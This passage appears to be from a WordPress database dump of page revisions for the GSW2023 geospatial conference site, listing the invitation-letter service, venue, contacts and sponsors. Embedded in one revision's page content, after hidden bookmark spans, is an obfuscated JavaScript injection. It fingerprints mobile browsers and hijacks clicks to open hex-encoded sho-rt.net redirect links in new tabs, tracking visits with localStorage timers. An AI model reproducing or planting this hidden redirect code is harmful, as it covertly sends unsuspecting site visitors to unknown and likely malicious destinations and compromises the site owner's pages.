width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-16 14:35:43','2023-09-16 14:35:43','',3066,'https://gsw2023.com/?p=5479',0,'revision','',0),
(5480,1,'2023-09-16 14:38:10','2023-09-16 14:38:10','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/Best presentation award GSW2023.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best_presentation.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Presentation Award</h4></p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 